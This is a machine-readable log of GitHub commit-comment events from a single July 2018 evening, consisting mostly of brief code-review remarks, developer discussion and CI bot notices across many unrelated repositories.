{"id":"8034485852","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876416,"position":110,"line":105,"path":"LocPeek/LocPeek/LocPeek.Android/MainActivity.cs","commit_id":"c4abc9305d9db2d24b832e75ebee3fbf2db333df","created_at":"2018-07-29T19:14:19Z","updated_at":"2018-07-29T19:14:19Z","author_association":"COLLABORATOR","body":"commented code"}},"created_at":"2018-07-29T19:14:19Z"}
{"id":"8034487365","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29876430,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-29T19:15:19Z","updated_at":"2018-07-29T19:15:19Z","author_association":"NONE","body":"@Stefano80 Basically you are choosing the best th->rootMoves.[0].score + th->completedDepth combination. Right?\r\nThis can be done much simpler, or am I missing something?\r\n\r\nBut if you want to collect votes for every best move of each thread, you have to loop a second time over all threads, of course."}},"created_at":"2018-07-29T19:15:19Z"}
{"id":"8034487483","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876431,"position":13,"line":17,"path":"LocPeek/LocPeek/LocPeek/App.xaml.cs","commit_id":"c4abc9305d9db2d24b832e75ebee3fbf2db333df","created_at":"2018-07-29T19:15:24Z","updated_at":"2018-07-29T19:15:24Z","author_association":"COLLABORATOR","body":"Why did you add this comment? Also if the next line is Optional, just remove it"}},"created_at":"2018-07-29T19:15:24Z"}
{"id":"8034488059","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876432,"position":14,"line":14,"path":"LocPeek/LocPeek/LocPeek/Models/GetGps.cs","commit_id":"512df9d11b07455585c507f202d40e822355f5e0","created_at":"2018-07-29T19:15:48Z","updated_at":"2018-07-29T19:15:48Z","author_association":"COLLABORATOR","body":"commented code"}},"created_at":"2018-07-29T19:15:48Z"}
{"id":"8034489385","type":"CommitCommentEvent","actor":{"login":"f1ght3rlucky"},"repo":{"name":"f1ght3rlucky/test1"},"payload":{"comment":{"id":29876435,"position":2,"line":2,"path":"readme.md","commit_id":"9581d12bdef00371c3442f98fc123f3e76b26ac3","created_at":"2018-07-29T19:16:45Z","updated_at":"2018-07-29T19:16:45Z","author_association":"OWNER","body":"Test"}},"created_at":"2018-07-29T19:16:45Z"}
{"id":"8034489684","type":"CommitCommentEvent","actor":{"login":"f1ght3rlucky"},"repo":{"name":"f1ght3rlucky/test1"},"payload":{"comment":{"id":29876436,"position":5,"line":3,"path":"readme.md","commit_id":"9581d12bdef00371c3442f98fc123f3e76b26ac3","created_at":"2018-07-29T19:17:00Z","updated_at":"2018-07-29T19:17:00Z","author_association":"OWNER","body":"TEST"}},"created_at":"2018-07-29T19:17:00Z"}
{"id":"8034490181","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876440,"position":34,"line":34,"path":"LocPeek/LocPeek/LocPeek/Models/GetGps.cs","commit_id":"512df9d11b07455585c507f202d40e822355f5e0","created_at":"2018-07-29T19:17:20Z","updated_at":"2018-07-29T19:17:20Z","author_association":"COLLABORATOR","body":"Empty method, should be removed"}},"created_at":"2018-07-29T19:17:20Z"}
{"id":"8034490430","type":"CommitCommentEvent","actor":{"login":"mgotovtsev"},"repo":{"name":"mgotovtsev/OsmToShape"},"payload":{"comment":{"id":29876441,"position":null,"line":null,"path":null,"commit_id":"adc45159e748b479db0f28532d270361b993c40f","created_at":"2018-07-29T19:17:31Z","updated_at":"2018-07-29T19:17:31Z","author_association":"OWNER","body":"dvd"}},"created_at":"2018-07-29T19:17:31Z"}
{"id":"8034491711","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876449,"position":39,"line":39,"path":"LocPeek/LocPeek/LocPeek/Models/GetGps.cs","commit_id":"512df9d11b07455585c507f202d40e822355f5e0","created_at":"2018-07-29T19:18:28Z","updated_at":"2018-07-29T19:18:28Z","author_association":"COLLABORATOR","body":"method name should contain a verb, eg. `SendPositionChangedEvent`"}},"created_at":"2018-07-29T19:18:28Z"}
{"id":"8034492025","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"cryptozeny/bitzeny"},"payload":{"comment":{"id":29876450,"position":null,"line":null,"path":null,"commit_id":"ea21675aab1b507de0815ab61202b50aa15c469e","created_at":"2018-07-29T19:18:42Z","updated_at":"2018-07-29T19:18:42Z","author_association":"OWNER","body":"@solardiz i updated bitzeny to yespower0.5 and it builds ok, but i got core dumped...\r\n\r\n```\r\nSegmentation fault (core dumped)\r\n```\r\n\r\ndo you know what's the problem? :sob: "}},"created_at":"2018-07-29T19:18:42Z"}
{"id":"8034492335","type":"CommitCommentEvent","actor":{"login":"dipanjanmukherjee83"},"repo":{"name":"dipanjanmukherjee83/githubrepo"},"payload":{"comment":{"id":29876451,"position":null,"line":null,"path":null,"commit_id":"a339039dd4df3e2ecff2d5b7d5fa9d86c2ec304e","created_at":"2018-07-29T19:18:55Z","updated_at":"2018-07-29T19:18:55Z","author_association":"OWNER","body":"approved"}},"created_at":"2018-07-29T19:18:55Z"}
{"id":"8034492514","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":29876452,"position":null,"line":null,"path":null,"commit_id":"0c4ba9385ead955a7015649e25af0de84ba97553","created_at":"2018-07-29T19:19:03Z","updated_at":"2018-07-29T19:19:03Z","author_association":"OWNER","body":"Hi Jörg, I am passing twice, actually. I am summing, for every move, the amount by which the minimum score across all threads is exceeded and the completed depth of every thread which chose that move.\r\n\r\nStefan, I am testing LTC with 8 threads, let us see how it goes. "}},"created_at":"2018-07-29T19:19:03Z"}
{"id":"8034492950","type":"CommitCommentEvent","actor":{"login":"bengl"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29876458,"position":33,"line":777,"path":"lib/fs.js","commit_id":"57b432c0549dbfe845747dcfe3ac485305de7779","created_at":"2018-07-29T19:19:23Z","updated_at":"2018-07-29T19:19:23Z","author_association":"MEMBER","body":"I don't think I can stash anything there without either making a new subclass of FSReqBase or adding a `withTypes` to it, which I think would be a waste because it would only be used in `readdir`."}},"created_at":"2018-07-29T19:19:23Z"}
{"id":"8034493218","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29876461,"position":23,"line":43,"path":"BankManagement/BankManagement/fileUtils.c","commit_id":"1bc0a3274b5fffe2f68be6d7e3a1e48705a0e954","created_at":"2018-07-29T19:19:34Z","updated_at":"2018-07-29T19:19:34Z","author_association":"NONE","body":"seems like a bad practice ( = תכנות לא נכון) to use exit(0) in order to say \"you entered wrong id\". I think it's better to return NULL, and than who uses file2struct should give the user a second change to enter the right ID, if null was returned. But it depends if you a nervous programmer (i.e. fuck the user) or you moderate one (i.e. lets give the user another chance...)"}},"created_at":"2018-07-29T19:19:34Z"}
{"id":"8034493696","type":"CommitCommentEvent","actor":{"login":"bengl"},"repo":{"name":"nodejs/node"},"payload":{"comment":{"id":29876465,"position":33,"line":777,"path":"lib/fs.js","commit_id":"57b432c0549dbfe845747dcfe3ac485305de7779","created_at":"2018-07-29T19:19:53Z","updated_at":"2018-07-29T19:19:53Z","author_association":"MEMBER","body":"I'll go ahead and try having an `AfterScanDirWithTypes`. It's not *that* much extra code."}},"created_at":"2018-07-29T19:19:53Z"}
{"id":"8034494007","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876466,"position":51,"line":51,"path":"LocPeek/LocPeek/LocPeek/Models/GetGps.cs","commit_id":"512df9d11b07455585c507f202d40e822355f5e0","created_at":"2018-07-29T19:20:05Z","updated_at":"2018-07-29T19:20:05Z","author_association":"COLLABORATOR","body":"why you need this two lines?"}},"created_at":"2018-07-29T19:20:05Z"}
{"id":"8034494477","type":"CommitCommentEvent","actor":{"login":"S10MC2015"},"repo":{"name":"MultiMC/MultiMC5"},"payload":{"comment":{"id":29876471,"position":null,"line":null,"path":null,"commit_id":"12f2716f31e09d18d47ffdbb6c06dfb71c6ec8fb","created_at":"2018-07-29T19:20:23Z","updated_at":"2018-07-29T19:20:23Z","author_association":"NONE","body":"Thank You"}},"created_at":"2018-07-29T19:20:23Z"}
{"id":"8034494987","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29876475,"position":5,"line":49,"path":"BankManagement/BankManagement/Bank.c","commit_id":"86e117a5c091f2f3d1efd980616c012320e65ab7","created_at":"2018-07-29T19:20:45Z","updated_at":"2018-07-29T19:20:45Z","author_association":"NONE","body":"why? "}},"created_at":"2018-07-29T19:20:45Z"}
{"id":"8034495100","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876478,"position":20,"line":20,"path":"LocPeek/LocPeek/LocPeek/Views/Main.Views/MapPage.xaml.cs","commit_id":"512df9d11b07455585c507f202d40e822355f5e0","created_at":"2018-07-29T19:20:50Z","updated_at":"2018-07-29T19:20:50Z","author_association":"COLLABORATOR","body":"empty lines"}},"created_at":"2018-07-29T19:20:50Z"}
{"id":"8034495640","type":"CommitCommentEvent","actor":{"login":"dipanjanmukherjee83"},"repo":{"name":"dipanjanmukherjee83/githubrepo"},"payload":{"comment":{"id":29876481,"position":null,"line":null,"path":null,"commit_id":"d09b5884f74543403b7804811b7738800915ac62","created_at":"2018-07-29T19:21:16Z","updated_at":"2018-07-29T19:21:16Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-29T19:21:16Z"}
{"id":"8034495822","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876482,"position":30,"line":30,"path":"LocPeek/LocPeek/LocPeek/Views/Main.Views/MapPage.xaml.cs","commit_id":"512df9d11b07455585c507f202d40e822355f5e0","created_at":"2018-07-29T19:21:25Z","updated_at":"2018-07-29T19:21:25Z","author_association":"COLLABORATOR","body":"a method should contain a verb"}},"created_at":"2018-07-29T19:21:25Z"}
{"id":"8034495884","type":"CommitCommentEvent","actor":{"login":"newtonne"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29876483,"position":10,"line":10,"path":"sysutils/packer/Portfile","commit_id":"d6f358ff080464824885ed8063573077749dff43","created_at":"2018-07-29T19:21:27Z","updated_at":"2018-07-29T19:21:27Z","author_association":"CONTRIBUTOR","body":"My bad. I did actually look at the documentation on this, but I assumed that it had become something of a standard since all openmaintainer values that I looked at had this format. Looks like all the ports I checked are actually maintained by contributors with macports.org email addresses."}},"created_at":"2018-07-29T19:21:27Z"}
{"id":"8034496022","type":"CommitCommentEvent","actor":{"login":"wvisser"},"repo":{"name":"GreenSolver/green"},"payload":{"comment":{"id":29876484,"position":2,"line":1,"path":"README.md","commit_id":"6bd440e81ce401502fd62e9c4c71d5ee113ef9c7","created_at":"2018-07-29T19:21:34Z","updated_at":"2018-07-29T19:21:34Z","author_association":"CONTRIBUTOR","body":"This needs to point to the correct travis data, otherwise you'll see the build status for the wrong project"}},"created_at":"2018-07-29T19:21:34Z"}
{"id":"8034496051","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876485,"position":40,"line":40,"path":"LocPeek/LocPeek/LocPeek/Views/Main.Views/MapPage.xaml.cs","commit_id":"512df9d11b07455585c507f202d40e822355f5e0","created_at":"2018-07-29T19:21:35Z","updated_at":"2018-07-29T19:21:35Z","author_association":"COLLABORATOR","body":"empty line"}},"created_at":"2018-07-29T19:21:35Z"}
{"id":"8034497062","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876492,"position":38,"line":38,"path":"LocPeek/LocPeek/LocPeek/Views/Main.Views/MapPage.xaml.cs","commit_id":"512df9d11b07455585c507f202d40e822355f5e0","created_at":"2018-07-29T19:22:18Z","updated_at":"2018-07-29T19:22:18Z","author_association":"COLLABORATOR","body":"maybe `MoveToLickedLocation` will be better named for this method?"}},"created_at":"2018-07-29T19:22:18Z"}
{"id":"8034497326","type":"CommitCommentEvent","actor":{"login":"newtonne"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29876496,"position":47,"line":47,"path":"sysutils/packer/Portfile","commit_id":"d6f358ff080464824885ed8063573077749dff43","created_at":"2018-07-29T19:22:29Z","updated_at":"2018-07-29T19:22:29Z","author_association":"CONTRIBUTOR","body":"Yeah, I just saw this in other ports and copied it blindly. Will fix."}},"created_at":"2018-07-29T19:22:29Z"}
{"id":"8034497976","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876500,"position":56,"line":56,"path":"LocPeek/LocPeek/LocPeek/Views/Main.Views/MapPage.xaml.cs","commit_id":"512df9d11b07455585c507f202d40e822355f5e0","created_at":"2018-07-29T19:22:59Z","updated_at":"2018-07-29T19:22:59Z","author_association":"COLLABORATOR","body":"verb, maybe `MoveToStartingPosition`"}},"created_at":"2018-07-29T19:22:59Z"}
{"id":"8034498199","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876501,"position":67,"line":67,"path":"LocPeek/LocPeek/LocPeek/Views/Main.Views/MapPage.xaml.cs","commit_id":"512df9d11b07455585c507f202d40e822355f5e0","created_at":"2018-07-29T19:23:09Z","updated_at":"2018-07-29T19:23:09Z","author_association":"COLLABORATOR","body":"empty lines"}},"created_at":"2018-07-29T19:23:09Z"}
{"id":"8034498300","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876502,"position":60,"line":60,"path":"LocPeek/LocPeek/LocPeek/Views/Main.Views/MapPage.xaml.cs","commit_id":"512df9d11b07455585c507f202d40e822355f5e0","created_at":"2018-07-29T19:23:14Z","updated_at":"2018-07-29T19:23:14Z","author_association":"COLLABORATOR","body":"empty line"}},"created_at":"2018-07-29T19:23:14Z"}
{"id":"8034498420","type":"CommitCommentEvent","actor":{"login":"Jey-Cee"},"repo":{"name":"Jey-Cee/ioBroker.deconz"},"payload":{"comment":{"id":29876504,"position":null,"line":null,"path":null,"commit_id":"2dd5130d4f9a3b6c1d06970570745ba166b702ac","created_at":"2018-07-29T19:23:20Z","updated_at":"2018-07-29T19:23:20Z","author_association":"OWNER","body":"#14 "}},"created_at":"2018-07-29T19:23:20Z"}
{"id":"8034498434","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876505,"position":5,"line":5,"path":"src/main/java/net/pms/io/ThreadedProcessWrapper.java","commit_id":"b53da04e7aeae5ddb4042340bda699b06f79f17e","created_at":"2018-07-29T19:23:21Z","updated_at":"2018-07-29T19:23:21Z","author_association":"CONTRIBUTOR","body":"@Sami32 You can stop reporting them, there's nothing I can do to fix bugs in PMD"}},"created_at":"2018-07-29T19:23:21Z"}
{"id":"8034506752","type":"CommitCommentEvent","actor":{"login":"stuhood"},"repo":{"name":"pantsbuild/pants"},"payload":{"comment":{"id":29876556,"position":13,"line":538,"path":"src/python/pants/scm/git.py","commit_id":"597c32ed27ee1842397a64aed1ba6ed8054bfa02","created_at":"2018-07-29T19:29:29Z","updated_at":"2018-07-29T19:29:29Z","author_association":"MEMBER","body":"Ditto remove join... not sure why it's here."}},"created_at":"2018-07-29T19:29:29Z"}
{"id":"8034506832","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29876557,"position":null,"line":null,"path":null,"commit_id":"52ae31efb21b31f5bb0763d1da24709e90393c59","created_at":"2018-07-29T19:29:33Z","updated_at":"2018-07-29T19:29:33Z","author_association":"MEMBER","body":"Personally I'd prefer going the other direction (moving `wesnoth.require` and `wesnoth.dofile` into the global namespace), but it doesn't matter _that_ much, so if everyone else prefers deprecating `load` and `loadstring` in favour of `wesnoth.loadstring`, I guess that would be okay.\r\n\r\nIf we go that route we could even drop the mode argument altogether for `wesnoth.loadstring`."}},"created_at":"2018-07-29T19:29:33Z"}
{"id":"8034506855","type":"CommitCommentEvent","actor":{"login":"SpaceManiac"},"repo":{"name":"tgstation/tgstation"},"payload":{"comment":{"id":29876558,"position":4,"line":20,"path":"code/modules/cargo/bounties/mech.dm","commit_id":"f75e5d7b689a87890bc44896109d584c289047fd","created_at":"2018-07-29T19:29:34Z","updated_at":"2018-07-29T19:29:34Z","author_association":"MEMBER","body":"This one is fine, I meant the `exclude_types` on the bounty for the Firefighter specifically (firefighters - ripleys is nothing)"}},"created_at":"2018-07-29T19:29:34Z"}
{"id":"8034507659","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876560,"position":null,"line":null,"path":null,"commit_id":"5111b0be159e7248721930bb48ceff596bd5051b","created_at":"2018-07-29T19:30:07Z","updated_at":"2018-07-29T19:30:07Z","author_association":"CONTRIBUTOR","body":"@Sami32 Instead of obsessing over PMD bugs, you should see if this commit is OK with you :wink: "}},"created_at":"2018-07-29T19:30:07Z"}
{"id":"8034508765","type":"CommitCommentEvent","actor":{"login":"NabiKAZ"},"repo":{"name":"Prajithp/letsencrypt-cpanel"},"payload":{"comment":{"id":29876570,"position":null,"line":null,"path":null,"commit_id":"e3ea1987406e0cd89d02a6a828600c97351983a5","created_at":"2018-07-29T19:30:50Z","updated_at":"2018-07-29T19:30:50Z","author_association":"NONE","body":"Why do you really think that someone does not use it?!\r\nThe project is currently 172 stars and is the only free project for the Cpanel Plugin.\r\nSo I use it and hopefully you continue to work on it.\r\nAlso, I will be glad to don't see the word \"Deprecated\" at the top of the page at the next visit 😉 \r\nLIKE THIS: https://github.com/Prajithp/letsencrypt-cpanel/issues/114"}},"created_at":"2018-07-29T19:30:50Z"}
{"id":"8034512787","type":"CommitCommentEvent","actor":{"login":"ericberman"},"repo":{"name":"ericberman/MyFlightbookWeb"},"payload":{"comment":{"id":29876585,"position":null,"line":null,"path":null,"commit_id":"7715af8b62f22f607a56414b2ac69e25d2a9e5fb","created_at":"2018-07-29T19:33:42Z","updated_at":"2018-07-29T19:33:42Z","author_association":"OWNER","body":"Woops, issue #63, not #68"}},"created_at":"2018-07-29T19:33:42Z"}
{"id":"8034516322","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29876596,"position":null,"line":null,"path":null,"commit_id":"7002ecb9690f5ae24333dcf4d86bb8dbde22bf97","created_at":"2018-07-29T19:36:14Z","updated_at":"2018-07-29T19:36:14Z","author_association":"COLLABORATOR","body":"Puzzle `5-dec07794` disappeared from [`src/main/java/io/zold/api/RtNetwork.java`](https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/RtNetwork.java), that's why I closed #41. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-29T19:36:14Z"}
{"id":"8034516378","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/java-api"},"payload":{"comment":{"id":29876597,"position":null,"line":null,"path":null,"commit_id":"7002ecb9690f5ae24333dcf4d86bb8dbde22bf97","created_at":"2018-07-29T19:36:16Z","updated_at":"2018-07-29T19:36:16Z","author_association":"COLLABORATOR","body":"Puzzle `41-44da2a34` discovered in   [`src/main/java/io/zold/api/Copies.java`](  https://github.com/zold-io/java-api/blob/master/src/main/java/io/zold/api/Copies.java)   and submitted as #56. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-29T19:36:16Z"}
{"id":"8034516787","type":"CommitCommentEvent","actor":{"login":"moon2263"},"repo":{"name":"moon2263/packet_capture"},"payload":{"comment":{"id":29876598,"position":null,"line":null,"path":null,"commit_id":"cb3c0e7f6c1c5c1c326f00c27c7fb50c5448fd3c","created_at":"2018-07-29T19:36:34Z","updated_at":"2018-07-29T19:36:34Z","author_association":"OWNER","body":"second commit: https://github.com/moon2263/packet_capture/commit/8f67f362b779923d606ac56f95a00a235ada60a5#diff-118fcbaaba162ba17933c7893247df3a\r\n\r\nthird commit:\r\nhttps://github.com/moon2263/packet_capture/commit/a6fba5ae62cbf39cc9543422c20d781a83b62193#diff-118fcbaaba162ba17933c7893247df3a"}},"created_at":"2018-07-29T19:36:34Z"}
{"id":"8034517297","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29876601,"position":null,"line":null,"path":null,"commit_id":"bdf8719f98411f076e6dd5aacc17abc7b4df755b","created_at":"2018-07-29T19:36:57Z","updated_at":"2018-07-29T19:36:57Z","author_association":"MEMBER","body":"Why 2 init blocks?"}},"created_at":"2018-07-29T19:36:57Z"}
{"id":"8034519443","type":"CommitCommentEvent","actor":{"login":"dallincoons"},"repo":{"name":"tightenco/parental"},"payload":{"comment":{"id":29876607,"position":null,"line":null,"path":null,"commit_id":"a42bc7d083731682676dd037f13154105cef07bf","created_at":"2018-07-29T19:38:33Z","updated_at":"2018-07-29T19:38:33Z","author_association":"CONTRIBUTOR","body":"0.4-alpha.1 should be it"}},"created_at":"2018-07-29T19:38:33Z"}
{"id":"8034519876","type":"CommitCommentEvent","actor":{"login":"moon2263"},"repo":{"name":"moon2263/packet_capture"},"payload":{"comment":{"id":29876619,"position":143,"line":143,"path":"main.cpp","commit_id":"cb3c0e7f6c1c5c1c326f00c27c7fb50c5448fd3c","created_at":"2018-07-29T19:38:54Z","updated_at":"2018-07-29T19:38:54Z","author_association":"OWNER","body":"second commit: https://github.com/moon2263/packet_capture/commit/8f67f362b779923d606ac56f95a00a235ada60a5#diff-118fcbaaba162ba17933c7893247df3a\r\n\r\nthird commit:\r\nhttps://github.com/moon2263/packet_capture/commit/a6fba5ae62cbf39cc9543422c20d781a83b62193#diff-118fcbaaba162ba17933c7893247df3a"}},"created_at":"2018-07-29T19:38:54Z"}
{"id":"8034519938","type":"CommitCommentEvent","actor":{"login":"gnuton"},"repo":{"name":"blastrock/pkgj"},"payload":{"comment":{"id":29876620,"position":null,"line":null,"path":null,"commit_id":"e438cfb2c1ef3f9c5d60220ad21b27b7c738baac","created_at":"2018-07-29T19:38:56Z","updated_at":"2018-07-29T19:38:56Z","author_association":"NONE","body":"Hi, thanks for updating the README file.\r\nIIRC from my yesterday try, re-running ci/ci.sh doesn't work. Moreover running ci/ci.sh multiple time would force conan to rebuild dependencies which would take ages.\r\nIf I do not mistake runnig ninja in build would trigger the build once again and that should be much faster than installing deps and more... once again.\r\n"}},"created_at":"2018-07-29T19:38:56Z"}
{"id":"8034523623","type":"CommitCommentEvent","actor":{"login":"CD0x23"},"repo":{"name":"zack-bitcoin/amoveo"},"payload":{"comment":{"id":29876626,"position":24,"line":24,"path":"docs/blog_posts/difficulty_oscillations.md","commit_id":"85f35714971907afe5f7961bc7d93b83f24f0ab4","created_at":"2018-07-29T19:41:35Z","updated_at":"2018-07-29T19:41:35Z","author_association":"NONE","body":"\"fequency\" => \"frequency\""}},"created_at":"2018-07-29T19:41:35Z"}
{"id":"8034524521","type":"CommitCommentEvent","actor":{"login":"haberc"},"repo":{"name":"flowin-ibm/website"},"payload":{"comment":{"id":29876630,"position":null,"line":null,"path":null,"commit_id":"f1392fc845ce1f05629c3f624906af6ab7cac150","created_at":"2018-07-29T19:42:13Z","updated_at":"2018-07-29T19:42:13Z","author_association":"CONTRIBUTOR","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/b5fbd4e7-2cf5-46fe-b349-6646d1cf8d04?env_id=ibm%3Ayp%3Aeu-gb \"flowin-website-toolchain\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/585f8993-389c-496f-ac44-9008022cf5e6?env_id=ibm%3Ayp%3Aeu-gb \"flowin-website-toolchain\") deployed [website](https://github.com/flowin-ibm/website/releases/tag/deploy-ibm-yp-eu-gb-flood.prevention.bb-gmail.com-dev-20180729-194212 \"deploy-ibm-yp-eu-gb-flood.prevention.bb-gmail.com-dev-20180729-194212\") to [dev](https://console.bluemix.net/apps/f4aadab3-79df-4cbc-abc4-f714b8f18659?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:flood.prevention.bb@gmail.com:dev\"), including this commit"}},"created_at":"2018-07-29T19:42:13Z"}
{"id":"8034525790","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29876638,"position":null,"line":null,"path":null,"commit_id":"d0bccafe0c9820a471cf8a823f3b5cbc54df7734","created_at":"2018-07-29T19:42:53Z","updated_at":"2018-07-29T19:42:53Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-53](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-53).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-53-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-29T19:42:53Z"}
{"id":"8034527805","type":"CommitCommentEvent","actor":{"login":"jmel0001"},"repo":{"name":"jmel0001/last-test"},"payload":{"comment":{"id":29876650,"position":null,"line":null,"path":null,"commit_id":"e7d4f1b820f36298405783d671fbc6b914e19b70","created_at":"2018-07-29T19:44:01Z","updated_at":"2018-07-29T19:44:01Z","author_association":"OWNER","body":"- **O**nly I can change my life. ... \r\n- **G**ood, better, best. ...\r\n- **O**ptimism is the faith that leads to achievement. ...\r\n- **L**ife is 10% what happens to you and 90% how you react to it. ...\r\n- **W**ith the new day comes new strength and new thoughts. ...\r\n- **F**ailure will never overtake me if my determination to succeed is strong enough. ...\r\n- **C**hange your life today."}},"created_at":"2018-07-29T19:44:01Z"}
{"id":"8034528305","type":"CommitCommentEvent","actor":{"login":"aelane"},"repo":{"name":"aelane/FitnessTracking"},"payload":{"comment":{"id":29876651,"position":null,"line":null,"path":null,"commit_id":"4ea1c790daf6a7cda7361e71718b00e3d7d5151f","created_at":"2018-07-29T19:44:17Z","updated_at":"2018-07-29T19:44:17Z","author_association":"OWNER","body":"Looks fine. Diffs on notebooks are hard since it's really json code"}},"created_at":"2018-07-29T19:44:17Z"}
{"id":"8034528908","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876652,"position":20,"line":20,"path":"lesson9/Task1.java","commit_id":"ee623d9abd9e115c682dd8235339d6ecd56175bb","created_at":"2018-07-29T19:44:40Z","updated_at":"2018-07-29T19:44:40Z","author_association":"NONE","body":"одной строки отступа достаточно"}},"created_at":"2018-07-29T19:44:40Z"}
{"id":"8034529124","type":"CommitCommentEvent","actor":{"login":"jmel0001"},"repo":{"name":"jmel0001/last-test"},"payload":{"comment":{"id":29876656,"position":null,"line":null,"path":null,"commit_id":"e7d4f1b820f36298405783d671fbc6b914e19b70","created_at":"2018-07-29T19:44:48Z","updated_at":"2018-07-29T19:44:48Z","author_association":"OWNER","body":"Changes on the git browser"}},"created_at":"2018-07-29T19:44:48Z"}
{"id":"8034529221","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876657,"position":9,"line":9,"path":"lesson9/Task1.java","commit_id":"ee623d9abd9e115c682dd8235339d6ecd56175bb","created_at":"2018-07-29T19:44:51Z","updated_at":"2018-07-29T19:44:51Z","author_association":"NONE","body":"в данном случае лучше подошла бы реализация LinkedList"}},"created_at":"2018-07-29T19:44:51Z"}
{"id":"8034529504","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876664,"position":32,"line":32,"path":"lesson9/Task1.java","commit_id":"ee623d9abd9e115c682dd8235339d6ecd56175bb","created_at":"2018-07-29T19:45:03Z","updated_at":"2018-07-29T19:45:03Z","author_association":"NONE","body":"\r\nникакого хардкода и магических чисел, все выносим в константы"}},"created_at":"2018-07-29T19:45:03Z"}
{"id":"8034529619","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework2"},"payload":{"comment":{"id":29876666,"position":37,"line":37,"path":"lesson9/Task1.java","commit_id":"ee623d9abd9e115c682dd8235339d6ecd56175bb","created_at":"2018-07-29T19:45:08Z","updated_at":"2018-07-29T19:45:08Z","author_association":"NONE","body":"в методе main только проверка написанного, все остальное выносим в отдельные классы (утилитные например)"}},"created_at":"2018-07-29T19:45:08Z"}
{"id":"8034529895","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"hyejin106/pcap_test"},"payload":{"comment":{"id":29876667,"position":5,"line":64,"path":"main.cpp","commit_id":"002a76150aca77fcfacc7c2ba98c2a0673670b33","created_at":"2018-07-29T19:45:16Z","updated_at":"2018-07-29T19:45:16Z","author_association":"NONE","body":"ip_header->ip_len 값은 host byte order로 바꾸어 줘야 할 건데? 그래고 IP헤더의 ip_len에는 ethernet header는 포함되지 않음."}},"created_at":"2018-07-29T19:45:16Z"}
